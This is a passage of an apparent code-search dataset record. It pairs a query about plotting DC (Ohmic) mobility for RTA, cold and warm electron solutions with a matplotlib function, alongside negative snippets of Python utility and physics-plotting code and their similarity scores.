base.append(\"--data\")\n return base", "def list_cleanup(self, data):\n for data_value in list(data):\n # TODO: Add DEBUG logging (?)\n for filter_key, filter_value in self.required.items():\n if filter_key in data_value.keys():\n if isinstance(filter_value, str) and self.exact_match:\n if data_value[filter_key] != filter_value:\n data.remove(data_value)\n break\n elif isinstance(filter_value, str) and (not self.exact_match):\n if data_value[filter_key] is None:\n data.remove(data_value)\n break\n if filter_value not in data_value[filter_key]:\n data.remove(data_value)\n break\n elif isinstance(filter_value, list) and self.exact_match:\n if data_value[filter_key] not in filter_value:\n data.remove(data_value)\n break\n elif isinstance(filter_value, list) and (not self.exact_match):\n if data_value[filter_key] is None:\n data.remove(data_value)\n break\n found_match = False\n for filter_value_item in filter_value:\n if filter_value_item in data_value[filter_key]:\n found_match = True\n if not found_match:\n data.remove(data_value)\n break\n else:\n self.logger.warning(msg=\"List_Cleanup: None of the cases matched. Data: %s Filter: %s\" % (data_value, self.filter))\n # TODO: Handle other possible cases\n else:\n self.logger.warning(msg=\"List_Cleanup: Filter key: %s not present in Data: %s\" % (filter_key, data_value))\n continue\n\n for data_value in list(data):\n # TODO: Add DEBUG logging (?)\n for filter_key, filter_value in self.excluded.items():\n if filter_key in data_value.keys():\n if isinstance(filter_value, str) and self.exact_match:\n if data_value[filter_key] == filter_value:\n data.remove(data_value)\n break\n elif isinstance(filter_value, str) and (not self.exact_match):\n if data_value[filter_key] is None:\n continue\n if filter_value in data_value[filter_key]:\n data.remove(data_value)\n break\n elif isinstance(filter_value, list) and self.exact_match:\n if data_value[filter_key] in filter_value:\n data.remove(data_value)\n break\n elif isinstance(filter_value, list) and (not self.exact_match):\n if data_value[filter_key] is None:\n continue\n found_match = False\n for filter_value_item in filter_value:\n if filter_value_item in data_value[filter_key]:\n found_match = True\n if found_match:\n data.remove(data_value)\n break\n else:\n self.logger.warning(msg=\"List_Cleanup: None of the cases matched. Data: %s Filter: %s\" % (data_value, self.filter))\n # TODO: Handle other possible cases\n else:\n self.logger.warning(msg=\"List_Cleanup: Filter key: %s not present in Data: %s\" % (filter_key, data_value))\n continue\n\n return data", "def buildWithout(self, mods):\n for modname in mods:\n try:\n self.optmodules.remove(modname)\n except:\n print \"\\n*** WARNING: \" + modname + \" not found in the list of modules from \" + self.name + \"!!\"\n print \"please recheck your config file: names are case-sensitive!!\"", "def _unsuppress_hidden(self):\n\n spa = [a for a in self._actions if isinstance(a, argparse._SubParsersAction)]\n assert len(spa) == 1\n spa = spa[0]\n for choices_action in spa._choices_actions:\n dest = choices_action.dest\n if choices_action.help == argparse.SUPPRESS:\n choices_action.help = spa.choices[dest].description", "def _validate_disabled_options(self, proposal) -> List[str]:\n if proposal.value is None or not proposal.value:\n return []\n proposal_diff = set(proposal.value).difference_update(set(self._options_labels))\n assert (\n not proposal_diff\n ), f\"Invalid passed options for 'disabled_options': {proposal_diff}\"\n return proposal.value", "def _CommonOptions(self, p):\n super()._CommonOptions(p, opt_v=False)", "def clean_up_dict(clean_dict, ignore_list):\n for i in ignore_list:\n clean_dict.pop(i, None)\n return clean_dict", "def test_removeFlagsSilently(self):\n self._flagsSilentlyTest('removeFlags', b'-FLAGS.SILENT')", "def check_options(self, options):\n return not any(not isinstance(element, str) for element in options)", "def exclude_list(self):\n pass", "def _filter_unused_argument_dash_m(self, arguments):\n return [argument for argument in arguments if argument != '-m']", "def remove_option(self, option):\n splitvals = option.split('/')\n section, key = \"/\".join(splitvals[:-1]), splitvals[-1]\n\n RawConfigParser.remove_option(self, section, key)\n self._dirty = True", "def prune_sidecar(self):\n short_fields = list(self.sidecar_template_short.keys())\n full_fields = list(self.sidecar_template)\n exclude_list = []\n for field, value in self.sidecar_template.items():\n if value:\n # check to make sure value isn't a list of null types\n # e.g. if value = [None, None, None] we don't want to include it.\n if type(value) is list:\n none_count = value.count(None)\n if len(value) == none_count:\n pass\n else:\n exclude_list.append(field)\n else:\n exclude_list.append(field)\n\n exclude_list = exclude_list + short_fields\n\n destroy_list = set(full_fields) - set(exclude_list)\n\n destroyed = []\n for to_be_destroyed in destroy_list:\n destroyed.append(self.sidecar_template.pop(to_be_destroyed))\n\n return destroyed", "def test_options_listed_in_build_options(self) -> None:\n testdir = os.path.join(self.unit_test_dir, '112 list build options')\n\n out = self.init(testdir)\n for line in out.splitlines():\n if line.startswith('Message: Build options:'):\n self.assertNotIn('-Dauto_features=auto', line)\n self.assertNotIn('-Doptional=auto', line)\n\n self.wipe()\n self.mac_ci_delay()\n\n out = self.init(testdir, extra_args=['-Dauto_features=disabled', '-Doptional=enabled'])\n for line in out.splitlines():\n if line.startswith('Message: Build options:'):\n self.assertIn('-Dauto_features=disabled', line)\n self.assertIn('-Doptional=enabled', line)\n\n self.setconf('-Doptional=disabled')\n out = self.build()\n for line in out.splitlines():\n if line.startswith('Message: Build options:'):\n self.assertIn('-Dauto_features=disabled', line)\n self.assertNotIn('-Doptional=enabled', line)\n self.assertIn('-Doptional=disabled', line)", "def deselect_all(self):\n if not self.is_multiple:\n raise NotImplementedError(\"You may only deselect all options of a multi-select\")\n\n for opt in self.browser.execute_script(self.SELECTED_OPTIONS, self.browser.element(self)):\n self.browser.raw_click(opt)" ]
[ "0.7164903", "0.62534535", "0.62313527", "0.6177054", "0.6156464", "0.61167467", "0.598523", "0.5968531", "0.5958963", "0.5934466", "0.5840218", "0.5644665", "0.5616773", "0.55490786", "0.55408776", "0.551189", "0.5459334", "0.54491204", "0.54466665", "0.54283345", "0.5392538", "0.5366404", "0.536355", "0.5344467", "0.53329617", "0.5325878", "0.53171146", "0.5312498", "0.53034884", "0.5288524" ]
0.7166121
0
Make a paper plot for the Ohmic (or linear) mobility of the RTA, lowfield, and fulldrift solutions.
def linear_mobility_paperplot(fieldVector,df): vcm = np.array(fieldVector) * 1e-2 lw = 1.5 mu_1 = [] mu_2 = [] mu_3 = [] meanE_1 = [] meanE_2 = [] meanE_3 = [] for ee in fieldVector: chi_1_i = np.load(pp.outputLoc + 'Steady/' + 'chi_' + '1_' + "E_{:.1e}.npy".format(ee)) chi_2_i = np.load(pp.outputLoc + 'Steady/' + 'chi_' + '2_' + "E_{:.1e}.npy".format(ee)) chi_3_i = np.load(pp.outputLoc + 'Steady/' + 'chi_' + '3_' + "E_{:.1e}.npy".format(ee)) mu_1.append(utilities.calc_linear_mobility(chi_1_i, df, ee) * 10 ** 4) mu_2.append(utilities.calc_linear_mobility(chi_2_i, df, ee) * 10 ** 4) mu_3.append(utilities.calc_linear_mobility(chi_3_i, df, ee) * 10 ** 4) meanE_1.append(utilities.mean_energy(chi_1_i,df)) meanE_2.append(utilities.mean_energy(chi_2_i,df)) meanE_3.append(utilities.mean_energy(chi_3_i,df)) plt.figure(figsize=(2.05,2.5)) # ax = plt.axes([0.2, 0.19, 0.75, 0.76]) ax = plt.axes([0.21, 0.19, 0.75, 0.75]) mufac = 1000 # mufac = 1000 ax.plot(vcm, np.array(mu_3)/mufac, '-', linewidth=lw, label='Warm', color=warm_color) ax.plot(vcm, np.array(mu_2)/mufac, '--', linewidth=lw, label='Cold', color=cold_color) ax.plot(vcm, np.array(mu_1)/mufac, '--', linewidth=lw, label='RTA', color=rta_color) plt.xlim([0,np.max(fieldVector)/100]) plt.xlabel(r'Electric field ($\rm V \, cm^{-1}$)') # plt.ylabel(r'$\sigma^{\omega = 0}_{\parallel}$ ($\rm cm^2 \, kV^{-1}\, s^{-1}$)') plt.ylabel(r'DC mobility (1000 $\rm cm^2 \, V^{-1}\, s^{-1}$)') plt.ylim([0.8e4/mufac, 2e4/mufac]) ax.locator_params(axis='x', nbins=6) # plt.legend(ncol=3,loc='lower center',frameon=False) plt.legend(frameon=False) plt.savefig(pp.figureLoc +'linear_mobility2.png',dpi=600) plt.figure() lw = 2 plt.plot(vcm,(np.array(meanE_1) -np.min(df['energy [eV]']))*1000,'-', linewidth=lw, label='RTA') plt.plot(vcm,(np.array(meanE_2) -np.min(df['energy [eV]']))*1000,'-', linewidth=lw, label='Cold '+r'$e^{-}$') plt.plot(vcm,(np.array(meanE_3) -np.min(df['energy [eV]']))*1000,'-', linewidth=lw, label='Warm '+r'$e^{-}$') plt.xlabel(r'Electric field [$kV/cm$]') plt.ylabel(r'Mean Energy [meV]') plt.title(pp.title_str) plt.savefig(pp.figureLoc +'meanEnergy_vField.png', bbox_inches='tight',dpi=600) plt.legend(frameon=False)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def small_signal_mobility_paperplot(fieldVector, freqVector, df):\n vcm = np.array(fieldVector)*1e-2\n n = utilities.calculate_density(df)\n lw = 1.5\n fig, ax = plt.subplots()\n for freq in freqVector:\n cond = []\n mu_3 = []\n for ee in fieldVector:\n chi_3_i = np.load(pp.outputLoc + 'Steady/' + 'chi_' + '3_' + \"E_{:.1e}.npy\".format(ee))\n mu_3.append(utilities.calc_linear_mobility(chi_3_i, df, ee) * 10 ** 4)\n cond.append(np.load(pp.outputLoc + 'Small_Signal/' + 'cond_' + '3_' + \"f_{:.1e}_E_{:.1e}.npy\".format(freq, ee)))\n ax.plot(vcm, np.array(np.real(cond))/c.e/n*100**2, '-', label='{:.1f} GHz'.format(freq),linewidth=lw)\n ax.plot(vcm,mu_3,'-',label = 'Ohmic Mobility',linewidth=lw)\n plt.xlabel(r'Field ($\\rm V \\, cm^{-1}$)')\n plt.ylabel(r'AC Mobility ($\\rm cm^2 \\, V^{-1} \\, s^{-1}$)')\n plt.ylim([-0.05*np.max(mu_3),np.max(mu_3)*1.2])\n # ax.text(0.55, 0.95, textstr, transform=ax.transAxes, fontsize=8, verticalalignment='top', bbox=props)\n plt.legend(ncol=3,loc='lower center')\n plt.savefig(pp.figureLoc+'ac_mobility.png', bbox_inches='tight',dpi=600)\n\n\n plt.figure(figsize=(2.05, 2.5))\n ax = plt.axes([0.21, 0.19, 0.75, 0.75])\n i = 0\n for ee in fieldVector:\n colorList = [eq_color, med_color, high_color]\n cond = []\n cond_linear = []\n mu_3 = []\n for freq in freqVector:\n mu_3 = []\n chi_3_i = np.load(pp.outputLoc + 'Steady/' + 'chi_' + '3_' + \"E_{:.1e}.npy\".format(ee))\n mu_3.append(utilities.calc_linear_mobility(chi_3_i, df, ee) * 10 ** 4)\n cond.append(np.load(pp.outputLoc + 'Small_Signal/' + 'cond_' + '3_' + \"f_{:.1e}_E_{:.1e}.npy\".format(freq, ee)))\n cond_linear.append(np.load(pp.outputLoc + 'Small_Signal/' + 'linear_cond_' + '3_' + \"f_{:.1e}_E_{:.1e}.npy\".format(freq, ee)))\n ax.plot(freqVector, np.array(np.real(cond))/c.e/n*100**2/1000, '-',\n label='{:.0f} '.format(ee/100)+r'$\\rm V \\, cm^{-1}$', linewidth=lw, color=colorList[i])\n # ax.plot(freqVector, np.array(cond_linear)/c.e/n*100**2, '-.', label='E = {:.0f} L '.format(ee/100)+r'$V \\, cm^{-1}$',linewidth=lw,color = colorList[i])\n i = i + 1\n\n plt.xlabel(r'Frequency (GHz)')\n plt.ylabel(r'$\\Re(\\rm AC\\ mobility$) (1000 $\\rm cm^2 \\, V^{-1}\\, s^{-1}$)')\n # plt.ylim([-0.4*np.max(mu_3),np.max(mu_3)*1.2])\n plt.xscale('log')\n plt.legend(frameon=False)\n plt.ylim([0, 20])\n plt.xlim([freqs[0], freqs[-1]])\n # ax.text(0.55, 0.95, textstr, transform=ax.transAxes, fontsize=8, verticalalignment='top', bbox=props)\n ax.yaxis.set_major_formatter(FormatStrFormatter('%.0f'))\n plt.xlim([freqVector[0],freqVector[-1]])\n locmaj = matplotlib.ticker.LogLocator(base=10, numticks=6)\n ax.xaxis.set_major_locator(locmaj)\n locmin = matplotlib.ticker.LogLocator(base=10.0, subs=np.arange(2, 10) * .1,\n numticks=100)\n ax.xaxis.set_minor_locator(locmin)\n plt.savefig(pp.figureLoc+'Real_ac_mobility.png',dpi=600)\n\n fig, ax = plt.subplots()\n i = 0\n for ee in fieldVector:\n colorList = ['black', 'dodgerblue', 'tomato']\n cond = []\n cond_linear = []\n mu_3 = []\n\n for freq in freqVector:\n mu_3 = []\n chi_3_i = np.load(pp.outputLoc + 'Steady/' + 'chi_' + '3_' + \"E_{:.1e}.npy\".format(ee))\n mu_3.append(utilities.calc_linear_mobility(chi_3_i, df, ee) * 10 ** 4)\n cond.append(\n np.load(pp.outputLoc + 'Small_Signal/' + 'cond_' + '3_' + \"f_{:.1e}_E_{:.1e}.npy\".format(freq, ee)))\n cond_linear.append(np.load(\n pp.outputLoc + 'Small_Signal/' + 'linear_cond_' + '3_' + \"f_{:.1e}_E_{:.1e}.npy\".format(freq, ee)))\n\n ax.plot(freqVector, np.array(np.imag(cond)) / c.e / n * 100 ** 2, '-',\n label='{:.0f} '.format(ee / 100) + r'$\\rm V \\, cm^{-1}$', linewidth=lw, color=colorList[i])\n # ax.plot(freqVector, np.array(cond_linear)/c.e/n*100**2, '-.', label='E = {:.0f} L '.format(ee/100)+r'$V \\, cm^{-1}$',linewidth=lw,color = colorList[i])\n\n i = i + 1\n plt.xlabel(r'Frequency ($\\rm GHz$)')\n plt.ylabel(r'$\\Im \\, [\\mu_{\\omega}]$ ($\\rm cm^2 \\, V^{-1}\\, s^{-1}$)')\n # plt.ylim([-0.4*np.max(mu_3),np.max(mu_3)*1.2])\n plt.xscale('log')\n plt.legend(frameon=False)\n # ax.text(0.55, 0.95, textstr, transform=ax.transAxes, fontsize=8, verticalalignment='top', bbox=props)\n plt.savefig(pp.figureLoc + 'Imag_ac_mobility.png', bbox_inches='tight', dpi=600)\n\n\n fig, ax = plt.subplots()\n i = 0\n for ee in fieldVector:\n colorList = ['black', 'dodgerblue', 'tomato']\n cond = []\n cond_linear = []\n mu_3 = []\n\n for freq in freqVector:\n mu_3 = []\n chi_3_i = np.load(pp.outputLoc + 'Steady/' + 'chi_' + '3_' + \"E_{:.1e}.npy\".format(ee))\n mu_3.append(utilities.calc_linear_mobility(chi_3_i, df, ee) * 10 ** 4)\n cond.append(\n np.load(pp.outputLoc + 'Small_Signal/' + 'cond_' + '3_' + \"f_{:.1e}_E_{:.1e}.npy\".format(freq, ee)))\n cond_linear.append(np.load(\n pp.outputLoc + 'Small_Signal/' + 'linear_cond_' + '3_' + \"f_{:.1e}_E_{:.1e}.npy\".format(freq, ee)))\n\n ax.plot(freqVector, np.array(np.arctan(np.imag(cond)/np.real(cond)))/np.pi, '-',\n label='{:.0f} '.format(ee / 100) + r'$\\rm V \\, cm^{-1}$', linewidth=lw, color=colorList[i])\n # ax.plot(freqVector, np.array(cond_linear)/c.e/n*100**2, '-.', label='E = {:.0f} L '.format(ee/100)+r'$V \\, cm^{-1}$',linewidth=lw,color = colorList[i])\n i = i + 1\n ax.yaxis.set_major_formatter(tck.FormatStrFormatter('%g $\\pi$'))\n ax.yaxis.set_major_locator(tck.MultipleLocator(base=1.0))\n plt.xlabel(r'Frequency ($\\rm GHz$)')\n plt.ylabel(r'AC Mobility Phase Angle (Radians)')\n # plt.ylim([-0.4*np.max(mu_3),np.max(mu_3)*1.2])\n plt.xscale('log')\n plt.legend()\n yloc = plt.MaxNLocator(6)\n ax.yaxis.set_major_locator(yloc)\n # ax.text(0.55, 0.95, textstr, transform=ax.transAxes, fontsize=8, verticalalignment='top', bbox=props)\n plt.savefig(pp.figureLoc + 'Phase_ac_mobility.png', bbox_inches='tight', dpi=600)", "def show_observables(rf, logical_pops_file='qubit_pop.dat',\n beta_pops_file='beta_pop.dat', exc_file='cavity_excitation.dat',\n pulse1_file='pulse1.dat', pulse2_file='pulse2.dat'):\n fig = plt.figure(figsize=(16,3.5), dpi=70)\n\n qubit_pop = np.genfromtxt(join(rf, logical_pops_file)).transpose()\n beta_pop = np.genfromtxt(join(rf, beta_pops_file)).transpose()\n exc = np.genfromtxt(join(rf, exc_file)).transpose()\n p1 = QDYN.pulse.Pulse.read(join(rf, pulse1_file))\n p2 = QDYN.pulse.Pulse.read(join(rf, pulse2_file))\n\n ax = fig.add_subplot(131)\n tgrid = qubit_pop[0] # microsecond\n ax.plot(tgrid, qubit_pop[1], label=r'00')\n ax.plot(tgrid, qubit_pop[2], label=r'01')\n ax.plot(tgrid, qubit_pop[3], label=r'10')\n ax.plot(tgrid, qubit_pop[4], label=r'11')\n ax.plot(tgrid, beta_pop[1], label=r'0010')\n ax.plot(tgrid, beta_pop[2], label=r'0001')\n analytical_pop = qubit_pop[1] + qubit_pop[2] + qubit_pop[3] \\\n + beta_pop[1] + beta_pop[2]\n ax.plot(tgrid, analytical_pop, label=r'ana. subsp.')\n ax.legend(loc='best', fancybox=True, framealpha=0.5)\n ax.set_xlabel(\"time (microsecond)\")\n ax.set_ylabel(\"population\")\n\n ax = fig.add_subplot(132)\n ax.plot(tgrid, exc[1], label=r'<n> (cav 1)')\n ax.plot(tgrid, exc[2], label=r'<n> (cav 2)')\n ax.plot(tgrid, exc[3], label=r'<L>')\n ax.legend(loc='best', fancybox=True, framealpha=0.5)\n ax.set_xlabel(\"time (microsecond)\")\n ax.set_ylabel(\"cavity excitation\")\n\n ax = fig.add_subplot(133)\n p1.render_pulse(ax, label='pulse 1')\n p2.render_pulse(ax, label='pulse 2')\n ax.legend(loc='best', fancybox=True, framealpha=0.5)\n\n #ax.set_xlim(-4, -1)", "def plot_tsnes():\n # Two environments (for main paper figure. All for final figure)\n ENVS = [\n \"BipedalWalker-v3\",\n #\"LunarLander-v2\",\n #\"Pendulum-v0\"\n \"Acrobot-v1\",\n #\"CartPole-v1\"\n ]\n ALGO_TYPES = [\n \"stablebaselines\",\n \"stablebaselines\",\n \"wann\",\n \"wann\",\n ]\n ALGO_NAMES = [\n \"A2C\",\n \"PPO\",\n \"NEAT\",\n \"CMAES\",\n ]\n ALGO_PRETTY_NAMES = [\n \"A2C\",\n \"PPO\",\n \"NEAT\",\n \"CMA-ES\"\n ]\n\n REWARD_SCALES = {\n \"Pendulum-v0\": [-1600, -200],\n \"Acrobot-v1\": [-500, -100],\n \"LunarLander-v2\": [-230, 200],\n \"BipedalWalker-v3\": [-100, 300],\n \"CartPole-v1\": [0, 500]\n }\n\n figure, axs = pyplot.subplots(\n figsize=[6.4 * 2, 4.8],\n nrows=2,\n ncols=4,\n gridspec_kw={'hspace': 0, 'wspace': 0},\n )\n\n for plot_i in range(2):\n env = ENVS[plot_i]\n reward_scale = REWARD_SCALES[env]\n for algo_i in range(len(ALGO_TYPES)):\n column_idx = (algo_i % 2) + plot_i * 2\n row_idx = 0 if algo_i <= 1 else 1\n ax = axs[row_idx, column_idx]\n algo_type = ALGO_TYPES[algo_i]\n algo_name = ALGO_NAMES[algo_i]\n algo_pretty_name = ALGO_PRETTY_NAMES[algo_i]\n\n experiment_glob = \"experiments/{}_{}_{}_*\".format(algo_type, env, algo_name)\n experiment_paths = glob(experiment_glob)\n tsnes = []\n rewards = []\n for experiment_path in experiment_paths:\n pivector_paths = glob(os.path.join(experiment_path, \"pivectors\", \"*\"))\n population_tsnes = []\n population_rewards = []\n for path in pivector_paths:\n data = np.load(path)\n population_tsnes.append(data[\"tsne\"])\n population_rewards.append(data[\"average_episodic_reward\"])\n data.close()\n tsnes.append(population_tsnes)\n rewards.append(population_rewards)\n tsnes = np.concatenate(tsnes, axis=0)\n rewards = np.concatenate(rewards, axis=0)\n\n # Min-max normalization\n rewards = (rewards - reward_scale[0]) / (reward_scale[1] - reward_scale[0])\n\n scatter = ax.scatter(\n tsnes[:, 0],\n tsnes[:, 1],\n c=rewards,\n cmap=\"plasma\",\n s=1,\n vmin=0,\n vmax=1\n )\n\n ax.text(0.98, 0.98, algo_pretty_name, horizontalalignment=\"right\", verticalalignment=\"top\", transform=ax.transAxes)\n ax.set_xticks([])\n ax.set_yticks([])\n # Hide spines, the outer edges\n ax.spines[\"top\"].set_alpha(0.2)\n ax.spines[\"bottom\"].set_alpha(0.2)\n ax.spines[\"left\"].set_alpha(0.2)\n ax.spines[\"right\"].set_alpha(0.2)\n # Hide edge spines and bolden mid-spines\n if row_idx == 0:\n ax.spines[\"top\"].set_visible(False)\n else:\n ax.spines[\"bottom\"].set_visible(False)\n if column_idx == 0:\n ax.spines[\"left\"].set_visible(False)\n elif column_idx == 1:\n ax.spines[\"right\"].set_alpha(1.0)\n elif column_idx == 2:\n ax.spines[\"left\"].set_alpha(1.0)\n elif column_idx == 3:\n ax.spines[\"right\"].set_visible(False)\n\n # Add titles\n if row_idx == 0 and (column_idx == 0 or column_idx == 2):\n ax.set_title(env.split(\"-\")[0], x=1.0)\n\n cbaxes = figure.add_axes([0.4, 0.94, 0.2, 0.02])\n cbar = figure.colorbar(scatter, orientation=\"horizontal\", cax=cbaxes)\n cbar.set_ticks([0.0, 0.5, 1.0])\n cbar.set_ticklabels([\"Min\", \"Reward\", \"Max\"])\n cbar.ax.xaxis.set_ticks_position('top')\n cbar.ax.xaxis.set_label_position('top')\n cbar.ax.tick_params(labelsize=\"small\", length=0)\n figure.tight_layout()\n figure.savefig(\"figures/tsnes.png\", dpi=200, bbox_inches=\"tight\", pad_inches=0.0)", "def _plot(self, rewards, losses, epsilons):\n plt.figure(figsize=(20,5))\n plt.subplot(131)\n plt.title('Episodic Reward')\n plt.plot(rewards)\n plt.subplot(132)\n plt.title('TD Loss')\n plt.plot(losses)\n plt.subplot(133)\n plt.title('Epsilon')\n plt.plot(epsilons)\n plt.tight_layout()\n plt.show()", "def plot_perturbation(wind=7, mldp=30, pref=\"ca\"):\n pl.clf()\n fig,axes = pl.subplots(3, 1, sharex=True, num=1,figsize=(6,6))\n model_kws = dict(pref=pref, reg=\"pert\",\n temp=None, salt=None, wind=wind, mldp=mldp,\n deepmld1={\"pert\":0, \"tpos\":165},\n deepmld2={\"pert\":0, \"tpos\":553},\n uppwell1={\"pert\":0, \"tpos\":165, \"pdays\":5},\n uppwell2={\"pert\":0, \"tpos\":553, \"pdays\":5})\n md = run_model(**model_kws)\n plot_timeseries(md, axes=axes, alpha=0.5) \n if pref == \"ca\":\n preftxt = \"CCS\"\n model_kws[\"uppwell1\"][\"pert\"] = 82.5\n model_kws[\"uppwell2\"][\"pert\"] = 165\n else:\n preftxt = \"NWA\"\n model_kws[\"deepmld1\"][\"pert\"] = 17\n model_kws[\"deepmld2\"][\"pert\"] = 34\n md = run_model(**model_kws)\n plot_timeseries(md, axes=axes, alpha=1)\n pl.suptitle(\n f\"Perturbations, temp and salt for {preftxt}, wind:{wind}m/s, mld:{mldp}m\")\n pl.savefig(os.path.join(FIGDIR, f\"pertubation_timeseries_{pref}.pdf\"))", "def main_paper(mode = 'q-diff'):\n mode_name = 'Shared Autonomy'\n if mode== 'override':\n mode_name = 'Overrider'\n\n #trains rl again and fills a q-table\n _, rl_agent = rl_alone(1000, fill_table = True)\n\n #prints the q-table\n for y in range(7):\n for x in range(7):\n state_ind = y*(7)+x\n q = rl_agent.get_q_values(state_ind)\n print('Q-table')\n print(state_ind, [x,y], np.around(q, decimals=5))\n\n in_li = []\n r_li = []\n rp_li=[]\n\n print(\"Begin looping through constraint values\")\n for i in np.arange(0.0, 1.025, 0.025):\n #cooperates and gets results\n rewards, actionsct, rewardsP = grid_human_co(coagent=rl_agent, threshold=i, verbose=False, mode=mode)\n print(\"Threshold: \", i)\n avgInter = np.mean(actionsct, axis=0)\n avgR = np.mean(rewards, axis=0)\n avgRP = np.mean(rewardsP, axis=0)\n in_li.append(avgInter)\n r_li.append(avgR)\n rp_li.append(avgRP)\n print('Avg num of interventions: ', avgInter)\n print('Avg reward: ', avgR)\n print('Avg reward penalized: ', avgRP)\n print()\n\n plt.figure()\n plt.plot(np.arange(0.0, 1.025, 0.025), in_li)\n plt.title(mode_name + ' Interventions')\n plt.xlabel(r\"$\\alpha$\")\n plt.ylabel('Average intervention count')\n plt.show()\n\n plt.figure()\n plt.title(mode_name + ' Returns', fontsize=14)\n plt.xlabel(r\"$\\alpha$\", fontsize=13)\n plt.ylabel('Average return', fontsize=13)\n plt.plot(np.arange(0.0, 1.025, 0.025), r_li,label='Average environment return')\n plt.plot(np.arange(0.0, 1.025, 0.025), rp_li,label=\"Average intervention return\")\n plt.legend(fontsize=9)\n plt.show()", "def quick_plot(solution):\n plt.suptitle('GNLSE solution')\n\n plt.subplot(1, 2, 1)\n plot_wavelength_vs_distance(solution)\n\n plt.subplot(1, 2, 2)\n plot_delay_vs_distance(solution)\n\n plt.show()", "def figure2():\n # sim_data_XPP = pd.read_csv(\"XPP.dat\", delimiter=\" \", header=None) # Load the XPP simulation\n\n plot_settings = {'y_limits': [-25, 0],\n 'x_limits': None,\n 'y_ticks': [-25, -20, -15, -10, -5, 0],\n 'locator_size': 2.5,\n 'y_label': 'Current (nA)',\n 'x_ticks': [],\n 'scale_size': 0,\n 'x_label': \"\",\n 'scale_loc': 4,\n 'figure_name': 'figure_2',\n 'legend': ['I-Na', 'I-NaP'],\n 'legend_size': 8,\n 'y_on': True}\n\n t, y = solver(100) # Integrate solution\n t_short = np.where((t >= 8) & (t <= 18))[0] # shorter time bounds for plots A and C\n v, m, h, m_nap, h_na_p, n, m_t, h_t, m_p, m_n, h_n, z_sk, m_a, h_a, m_h, ca = y[:, ].T # Extract all variables\n\n \"\"\"\n Explicitly calculate all currents: Extra constants duplicated from function dydt to calculate currents\n \"\"\"\n g_na_bar = 0.7\n g_nap_bar = 0.05\n g_k_bar = 1.3\n g_p_bar = 0.05\n g_leak = 0.005\n g_a_bar = 1.0\n e_na = 60\n e_k = -80\n e_leak = -50\n e_ca = 40\n g_t_bar = 0.1\n g_n_bar = 0.05\n g_sk_bar = 0.3\n\n \"\"\"\n Calculate currents used in the plot\n \"\"\"\n i_na = g_na_bar * (m ** 3) * h * (v - e_na)\n i_na_p = g_nap_bar * m_nap * h_na_p * (v - e_na)\n i_k = g_k_bar * (n ** 4) * (v - e_k)\n i_leak = g_leak * (v - e_leak)\n i_t = g_t_bar * m_t * h_t * (v - e_ca)\n i_n = g_n_bar * m_n * h_n * (v - e_ca)\n i_p = g_p_bar * m_p * (v - e_ca)\n i_sk = g_sk_bar * (z_sk ** 2) * (v - e_k)\n i_a = g_a_bar * m_a * h_a * (v - e_k)\n\n plt.figure(figsize=(5, 3), dpi=96) # Create figure\n\n plt.subplot(2, 2, 1) # Generate subplot 1 (top left)\n plt.plot(t[t_short], i_na[t_short], 'k-')\n plt.plot(t[t_short], i_na_p[t_short], c='k', linestyle='dotted')\n alter_figure(plot_settings) # Alter figure for publication\n\n plt.subplot(2, 2, 2) # Generate subplot 2 (top right)\n plt.plot(t, i_t + i_n + i_p, 'k-')\n plt.plot(t, i_t, c='k', linestyle='dotted')\n plt.plot(t, i_p, 'k--')\n plt.plot(t, i_n, 'k-.')\n\n plot_settings['y_limits'] = [-2.5, 0]\n plot_settings['y_ticks'] = [-2.5, -2, -1.5, -1, -0.5, 0]\n plot_settings['locator_size'] = 0.25\n plot_settings['y_label'] = \"\"\n plot_settings['legend'] = ['I-Ca', 'I-T', 'I-P', 'I-N']\n alter_figure(plot_settings) # Alter figure for publication\n\n plt.subplot(2, 2, 3) # Generate subplot 3 (bottom left)\n plt.plot(t[t_short], i_k[t_short], 'k-')\n plt.plot(t[t_short], i_a[t_short], c='k', linestyle='dotted')\n plt.plot(t[t_short], i_leak[t_short], 'k-.')\n\n plot_settings['y_limits'] = [0, 25]\n plot_settings['y_ticks'] = [0, 5, 10, 15, 20, 25]\n plot_settings['locator_size'] = 2.5\n plot_settings['y_label'] = \"Current (nA)\"\n plot_settings['legend'] = ['I-K', 'I-A', 'I-leak']\n plot_settings['scale_size'] = 2\n plot_settings['scale_loc'] = 2\n alter_figure(plot_settings) # Alter figure for publication\n\n plt.subplot(2, 2, 4) # Generate subplot 4 (bottom left)\n\n plt.plot(t, i_sk, 'k-')\n # plt.plot(sim_data_XPP[0][900:]-200,sim_data_XPP[34][900:]) # Isk for XPP data\n\n plot_settings['y_limits'] = [0, 1]\n plot_settings['y_ticks'] = [0, 0.2, 0.4, 0.6, 0.8, 1]\n plot_settings['locator_size'] = 0.2\n plot_settings['y_label'] = \"\"\n plot_settings['legend'] = ['I-SK']\n plot_settings['scale_size'] = 20\n plot_settings['scale_loc'] = 2\n alter_figure(plot_settings, close=True) # Alter figure for publication", "def reproduce_paper():\n dirname = os.path.join(DATADIR, 'ptn_runs')\n tdatlst_f3 = [multiple_pandas_to_teacher_data(dirname)]\n tdatlst_f2 = [multiple_pandas_to_teacher_data(dirname, remove_f3=True)]\n\n target_f3, labels = ids.gen_model(f3=True)\n target_f2, _ = ids.gen_model(f3=False)\n\n # Phoneme models and samples\n # --------------------------\n plt.figure(tight_layout=True, facecolor='white', figsize=(9.5, 6.34,))\n sns.set(rc={'axes.facecolor': '#bbbbbb', 'grid.color': '#aaaaaa'})\n\n plt.subplot2grid((2, 3), (0, 0), rowspan=2, colspan=2)\n plt.title('A')\n ids.plot_phoneme_models(tdatlst_f3[0], target_f3, labels,\n formants=[0, 1], nstd=2,\n legend=True, grayscale=True)\n plt.subplot2grid((2, 3), (0, 2))\n plt.title('B')\n ids.plot_phoneme_models(tdatlst_f3[0], target_f3, labels, formants=[1, 2],\n nstd=2, grayscale=True)\n plt.subplot2grid((2, 3), (1, 2))\n plt.title('C')\n ids.plot_phoneme_models(tdatlst_f3[0], target_f3, labels, formants=[0, 2],\n nstd=2, grayscale=True)\n\n plt.savefig('fig-1.png', dpi=300)\n\n # Articulation\n # ------------\n sns.set(rc={'axes.facecolor': '#e8e8e8', 'grid.color': '#ffffff'})\n f = plt.figure(tight_layout=True, facecolor='white', figsize=(9.5, 4.75,))\n\n ax1 = f.add_subplot(2, 1, 1)\n plt.title('A')\n indices = ids.plot_phoneme_articulation(tdatlst_f3, target_f3, labels,\n ax=ax1)\n ax2 = f.add_subplot(2, 1, 